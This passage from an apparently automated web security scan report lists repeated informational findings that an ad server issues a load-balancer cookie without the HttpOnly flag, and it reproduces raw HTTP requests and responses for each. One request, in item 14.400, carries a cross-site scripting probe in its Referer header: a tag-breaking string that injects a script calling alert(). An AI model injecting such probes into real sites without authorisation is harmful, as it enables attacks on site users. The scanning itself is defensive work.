Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/790701053/Middle/
...[SNIP]...

14.399. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1957359167@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1957359167@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1957359167@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4561
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1039059921/Middle
...[SNIP]...

14.400. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1972042870@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1972042870@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1972042870@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4259
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/979012939/Middle/
...[SNIP]...

14.401. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1088322501/Left1/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/1088322501/Left1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1088322501/Left1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.402. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1095051603/x05/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/1095051603/x05/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1095051603/x05/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.403. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1119361965/Bottom3/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/1119361965/Bottom3/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1119361965/Bottom3/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:36:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.404. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1146012391/Right1/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/1146012391/Right1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1146012391/Right1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.405. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1223143878/x02/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/1223143878/x02/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1223143878/x02/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.406. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/13627994/Left/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/13627994/Left/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/13627994/Left/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:36:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.407. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1384536630/Top/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/1384536630/Top/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1384536630/Top/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.408. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1408846600/Middle/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/1408846600/Middle/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1408846600/Middle/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.409. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1606215913/BottomRight/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/1606215913/BottomRight/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1606215913/BottomRight/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:36:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.410. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1812286391/x04/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/1812286391/x04/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/1812286391/x04/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.411. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/2062153072/x01/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/2062153072/x01/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/2062153072/x01/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.412. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/2117805232/Left2/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/2117805232/Left2/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/2117805232/Left2/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.413. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/258558596/Bottom2/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/258558596/Bottom2/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/258558596/Bottom2/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:36:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.414. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/327792408/Bottom1/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/327792408/Bottom1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/327792408/Bottom1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:36:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

14.415. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/402494553/Left3/default/empty.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/NaN/402494553/Left3/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/NaN/402494553/Left3/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
